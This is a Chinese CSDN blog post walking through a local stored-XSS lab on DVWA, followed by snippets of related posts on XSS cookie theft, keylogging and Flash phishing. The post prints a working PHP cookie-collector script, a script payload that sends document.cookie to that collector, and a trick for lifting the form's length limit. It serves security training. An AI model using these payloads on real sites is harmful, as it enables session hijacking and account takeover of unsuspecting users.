存储xss实现获取cookie(本地实战)

最新推荐文章于 2024-08-17 17:45:58 发布
最新推荐文章于 2024-08-17 17:45:58 发布
阅读量667 收藏 3
点赞数 9
文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80661529/article/details/136341767
版权
本文介绍了如何在PHPStudy环境中利用DVWA靶场进行XSS攻击实战,通过编写xss.php脚本捕获用户输入的cookie信息,并在DVWA的storedxss环节利用payload进行攻击。实战中还提到如何调整payload长度以绕过长度限制,最后强调了本地实战的重要性并祝学习者顺利。
摘要由CSDN通过智能技术生成

实战更能体验收获!!!

环境准备:

1.phpstudy

2.dvwa靶场

实战

首先我们在phpstudy指定的localhost网站目录下编写一个xss.php文件,内容如下:

<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?>

然后进入dvwa靶场(security=low),(stored xss)那关,留言写入如下payload。

payload:<script>document.write('<img src="http://127.0.0.1/xss.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');</script>

但是此关卡有长度限制,简单直接前端改一下长度即可:

50改为1000

刷新一下网页

然后到我们写的xss.php文件的目录下,会有一个cookie.txt文件,上面就会记录cookie及其IP

留言

实战结束留言:如果你拥有自己的网站以及服务器,本地实战就在你自己的服务器上实战即可,不过此处的IP地址也要跟着变化,不变化其实也行,但是改了更有实战的感觉,在此祝你们学习顺利!!!

Yf3_te
关注
2021-09-01 网安实验-XSS-存储XSS获取用户cookie
时光隧道
09-02 4万+
一:存储XSS 1.保存用户cookie 我们可以通过JS,构造一个请求,来请求一个我们有权限的页面,在构造请求的时候,把用户的cookie当作参数传过去,然后我们就可以在这个页面里,接收传过来的参数,然后再保存起来。所以首先需要写一个接收cookie的页面,它能够接收某个参数,然后保存起来。页面写好保存在c:\wamp\www\xss\的目录下,recv_cookies.php这个文件就是用来接收cookie并保存的,源码如下: 2.构造语句 <script>document.write(
ctf xss利用_利用存储XSS跨站漏洞偷取用户Cookie实战
weixin_42611310的博客
02-23 1681
声明 :严禁读者利用以下介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !攻击者要偷取Cookie , 就要让他们精心构造的恶意代码在受害者的计算机上运行 , 一般来说 , 是在用户访问一个网页的时候执行一段JavaScript代码 , 这段代码会...
XSS平台获取管理员cookie
2401_86440467的博客
08-09 220
接着来到后台登录(路径为pikachu/vul/xss/xssblind/admin_login.php)来到可以进行XSS注入的地方(演示使用pikachu的xss盲打靶场),粘贴提交。进入XSS平台xssaq.com,点击创建项目创建一个新项目。回到平台刷新查看,发现记录,点击查看,能够看到cookie。来到我的项目,查看配置代码,将第二条复制。获取cookie完成,欢迎指出错误与讨论。可以看到刚才留言成功。
Pikachu-XSS漏洞之cookie获取、钓鱼结果和键盘记录实战记录
最新发布
m0_74608722的博客
08-17 1238
我们可以向用户发送一个链接请求,用户点击后会给我们提前搭建好的后台发出一个请求,后台收到请求后会返回一个身份信息验证的Basic头部,如果用户安全意识不够,输入了敏感信息:用户名和密码,然后这些就会被发送到pkxss后台。首先我们登录进去,我们发现界面和get型的是完全一样的,我们随便输入点东西:发现并没有在url里面显示,那怎么回事那,其实这个就是post型的,请求是通过post的方式发送的。**好了,所有的Pikachu模块我们都已经练习完了,但是还遗留下一些实战训练,我们今天就来一口气完成!
基于dvwa的存储xss获取其中的cookie分享篇
weixin_47319512的博客
05-12 567
首先我们启动靶场,把难度级别调整到low,然后选择存储xxs,进入页面。
XSS-窃取Cookie pikachu靶场
starhei.zxy的博客
07-23 376
1.在https://xssaq.com/ ⽹站注册账号并登陆,点击"创建项⽬"并填写项⽬名称...⽴即提交。4.打开⼀个pikachu靶场 在 xss盲打里面将我们刚才复制的script恶意代码输⼊进去。5.pikachu管理员登录后台的操作 登录完成后触发我们插⼊的恶意代码。2.在我的项⽬中选择我们刚创建的项⽬ 点击右上⻆的查看配置代码。6.这个时候平台上可看到其劫持的Cookie信息。3.复制script这⼀条代码。
XSS-窃取Cookie及拓展
2301_76631050的博客
07-23 1145
步骤一:来到xss平台 点击公共模块---flash弹窗钓⻥-查看将其中的代码保存成⼀个js⽂件放到我们⽹站的根⽬录下⾯。步骤二:用记事本打开1.js 修改js中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。步骤七:点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...步骤⼋:配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!步骤二:在我的项目中选择我们刚创建的项目,点击右上角的查看配置代码。把文件复制到我们网站的根目录下。
利用XSS漏洞打cookie
qq_68163788的博客
01-15 2047
XSS漏洞是一种跨站脚本攻击,攻击者可以在受害者的浏览器中注入恶意脚本,从而获取用户的敏感信息,如cookie。 当受害者访问包含恶意脚本的页面时,恶意脚本会获取受害者的cookie信息,并将其发送到攻击者的服务器。攻击者可以利用这些cookie信息来冒充受害者进行各种操作,比如登录受害者的账户。为了防止XSS漏洞,网站开发者应该对用户输入进行严格的过滤和验证,避免将未经验证的用户输入直接输出到页面上。另外,网站可以使用XSS防护工具或者采用安全的编程实践来防止XSS漏洞的发生。
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战
m0_67844671的博客
10-05 4751
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
利用XSS窃取用户Cookie
Monsterlz123的博客
07-20 7401
XSS】利用XSS窃取用户Cookie Hello,各位小伙伴周六愉快。 晃眼之间一周又快要过去了,时间是不等人滴~~ 这周准备连发三篇XSS相关内容,两篇实战,一篇总结。 然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。 一、实验概述 实验拓扑: XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页...
xss攻击获取mysql数据,XSS漏洞攻击教程:
weixin_42316952的博客
03-27 983
XSS分类:1.反射型XSS(非持久型);2.存储XSS((持久型);3.DOM XSS(文档对象型).图片发自简书App图片发自简书App反射型XSS:发出请求时,XSS代码出现在URL中,作为输入提交到服务器端,服务器端解析后响应,XSS代码随响应内容一起传回给浏览器,最后浏览器解析执行XSS代码,这个过程称为反射型XSS.反射型XSS简单例子:echo $_GET['x'];?>注:...
XSS漏洞讲解与多篇实战讲解
浪子燕青的博客
02-25 3492
跨站脚本攻击 XSS攻击基础 概述 个人对XSS攻击的原理认知: 原理:对可以控制传参的位置,比如url链接中,输入框中,首先闭合输出参数位置前后网页标签,在闭合的中间加上JavaScript代码或者其他的html标签,使得网页能够执行你添加的参数功能。 危害:凡是js能做的,大部分xss漏洞都能利用,常见的比如获取当前cookie获取浏览器保存的账号密码 、获取屏幕截图,获取页面的数据,改变页面的逻辑,向服务器发送数据请求等。 情景:在挖洞的情景下,只要保证能弹个窗,或者执行js代码即可。但是
XSS (跨站脚本攻击) 分析与实战
a10534126的博客
02-23 1718
文章目录 一、漏洞原理 1、XSS简介: 2、XSS原理解析: 3、XSS的分类: 3.1、反射型XSS 3.2、存储XSS 3.3、DOM型XSS 二、靶场实战 XSS实现盗取管理员Cookie并登录: 一、漏洞原理 1、XSS简介: XSS全称:Cross Site Scripting,即跨站脚本攻击,为了不和“层叠样式表”(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是最常见的 Web 应用程序安
xss平台获取管理员cookie xss flash钓鱼拿到主机控制权
weixin_71053667的博客
07-23 437
点击"设置"--"解压后运行"如下两行内容...并在"模式"标签下设置"全部隐藏" 配置更新方式----解压并更新文件而覆盖方式----覆盖所有文件。5.将两个文件一块压缩并更改文件名为"flashcenter_pp_ax_install_cn.exe",点击"高级"标签页下的"自解压选项"填。3.来到xss平台 点击公共模块---flash弹窗钓鱼-查看 将其中的代码保存成一个js文件放到我们网站的根目录下面。4.模拟管理员登录后台的操作 登录完成后触发我们插入的恶意代码。# Flash官网下载。
XSS的键盘记录和cookie获取
Williamanddog的博客
01-26 1977
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
XSS平台获取cookie
qq_41048303的博客
02-19 3673
XSS平台获取cookie 1.环境介绍 靶场:pikachu XSS平台:BLUE-LOTUS 浏览器:火狐浏览器 2.流程介绍 登录XSS平台,创建获取cookie的脚本 var website = "http://网站地址"; (function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() { try { return d
XSS获取目标cookie,伪造身份获取目标权限
qq_57663276的博客
08-23 3239
未知攻,何来防。网络安全靶场学习:XSS(跨站脚本攻击),使用XSS伪造目标权限。
【每天学习一点新知识】XSS如何绕过HttpOnly获取Cookie以及XSS与CORS漏洞利用
RexHa的博客
10-27 6495
Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三种之一,并且HTTP头不超出(Accept,Accept-Language,Content-Language,Lat-Event-ID,Content-Type)这几种字段。(Cross-origin resource sharing),是H5提供的一种机制,WEB应用程序可以通过在HTTP增加字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源的,当不同域的请求发生时,就出现了跨域的现象。
XSS攻击详解:原理、防御与测试实战
- Cookie存储在客户端的敏感数据,如登录状态。 - Flash或JavaScript:动态加载的内容,也可能成为攻击入口。 4. **XSS漏洞修复** 修复方法包括: - 输入验证:确保只接受预期格式的输入,拒绝可能包含恶意...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值